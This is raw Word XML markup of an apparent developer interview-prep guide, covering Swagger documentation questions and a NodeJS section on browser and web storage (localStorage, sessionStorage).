    <w:p w14:paraId="1672BFB9"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B31C86A"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FE26ACA"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C27B0E2"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apis: ['./routes/*.js'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B99E59"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0FCAAC7" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example, a bearerAuth security scheme is defined and applied globally to all endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38306418"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7. How does Swagger handle versioning in APIs?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337CB15B" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>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Swagger handles API versioning by allowing you to define different versions of the API in the documentation. This can be done by including version information in the info object of the Swagger definition or by using different paths for each version (e.g., /v1/users and /v2/users).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ACB238"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8. Can you explain the difference between swagger-jsdoc and swagger-ui-express?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693DF717" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D2B04" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>swagger-jsdoc:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A library that parses JSDoc comments in your code and generates a Swagger definition (JSON or YAML) from them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA7DD06" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="212"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>swagger-ui-express:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A library that serves the Swagger UI, a web-based interface for interacting with the API, using the Swagger definition generated by swagger-jsdoc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D6D4DE"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9. What is the purpose of the components section in the Swagger definition?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B13080" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="213"/>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components section is used to define reusable components like schemas, parameters, responses, and securitySchemes. These components can be referenced throughout the API definition, reducing duplication and improving maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A25F6"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components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336F13C1"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schemas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475599B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F78F7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type: object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69486375"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properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C706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id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7311AECE"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type: integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086C114C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E038D9" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE284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type: string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F1A511" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>10. How do you handle large API documentation with multiple endpoints in Swagger?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0956348D" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="214"/>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Large API documentation can be managed by splitting the Swagger definition into multiple files and using $ref to reference them. This approach keeps the documentation organized and easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23038CB0" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B3B6506" w14:textId="77777777" w:rsidR="00BE2845" w:rsidRPr="00DA2F32" w:rsidRDefault="00BE2845" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06CA3BC3" w14:textId="49C5534B" w:rsidR="005C23E2" w:rsidRPr="00DA2F32" w:rsidRDefault="005C23E2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C57C33" w14:textId="2F7EFEF0" w:rsidR="009A2163" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc178383245"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>General Questions NodeJS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="0BA2F81C" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="315471C8" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc178383246"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is Browser Storage?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="0F9DCC04"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The Browser Storage or the Client-side Storage works on similar principles to the server-side storage but has different use cases. It consists of </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>JavaScript APIs </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>that allow us to store data on the client (i.e., on the user's machine), and then it could be retrieved when needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A87E6F"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There are a few ways by which we can store the data locally on our browsers, and the three popular ways are cookies. There is one main similarity between the three, and that is all three of these are stored on the user’s browser. This means that if the user’s data is stored in </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>Chrome</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, then that data will not be visible in other browsers such as Firefox. So basically, there are a number of ways provided by modern browsers to store data on the client-side and could be retrieved when necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62073F04"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Why should we store data in the browser?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B095C5C"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There are several reasons why many of the websites and apps we come across store some data locally in the browser. The major reason associated with browser storage is performance. The data stored locally in the user's browser is instantaneously available, and on the other hand, the remotely stored data is sent from the server to the user. Since the server response takes some time after a request is made for the data, we cannot always wait for it, so sometimes. It is beneficial to store the data in the browser for quicker access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41292271"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This implies that if the website relies on any data for the information to be accessed frequently. This information could have many distinct uses such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621B2DE7" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Persisting data from a previous browsing session like your username, storing the contents of a shopping cart from the previous session, items in a To Do list, remembering if a user was previously logged in, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BCE37D" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Personalization of the site settings/preferences that affect how your page renders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347013D1" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Settings like the user’s choice of color scheme, font size, whether some UI elements are visible or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB517DC" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Saving data and assets you want to keep handy if the network connection goes offline or for the site to load quicker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20613215" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="631"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data for tracking or analysis that needs to be updated frequently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCB1D54"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The use of varied cloud computing and storage facilities during a single specification is multi-cloud. Click to explore about, </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>Multi vs Hybrid vs Hybrid Multi-Cloud vs. Private Cloud</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A310737"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What is Web Storage?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EEB1CE"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Web storage such as were introduced with </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DA2F32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>HTML 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>. This made storing and retrieving data in browsers much easier, and one of the major improvements made with these in client-side storage was the storage size, which is much better than cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41280A19"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Web storage could be accessed using Java-script, and none of this data could be read by the server unless manually passed along with the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381827E4"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There are two objects for data storage on the client provided by HTML web storage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BF2242" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="632"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Local storage object</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> - Stores data with no expiration date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C91FBF1" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="632"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Session storage object</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> - Stores data for one session (data is lost when the browser tab is closed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B2EB5"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Local Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBBADCC"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It is a web storage method that helps us store data on the client’s computer in the form of key/value pairs in a web browser. The data is stored in local storage for a lifetime unless the user manually deletes it from the browser. It does not expire even when the user closes the window or tab. Instead, the data remains in the browser until and unless the browser's memory is cleared.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A072EFF"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It's data in the browser can only be accessed via JavaScript and HTML5. However, the user also could clear the browser data/cache to erase all local storage data. It has four methods that we can use to set, retrieve, remove and clear:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A2B5D8" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="633"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>We can use the setItem() method to set the data in local storage. This method takes two parameters, i.e., key and value. With this method, we can store value with a key. localStorage.setItem(key, value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D26E4B4" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="633"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>To retrieve the data stored in it, we can use the getItem() method. This method takes only one parameter, i.e., the key whose value we need to access. localStorage.getItem(key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1820A0F0" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="633"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>We can remove the data with the help of the removeItem() method, which is stored in memory about the key. local Storage removeItem(key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CADEF8" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="633"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The clear() method is used to clear all the data stored in it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD8AA62"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The local store has pros and cons to using local storage based on our use case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D46B8"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Pros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565EE7DE" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="634"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The data stored in it has no expiration date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F2267D" w14:textId="77777777" w:rsidR="00D71D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00D71D14" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="634"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The storage limit is about 10 MB</w:t>
      </w:r>
    </w:p>
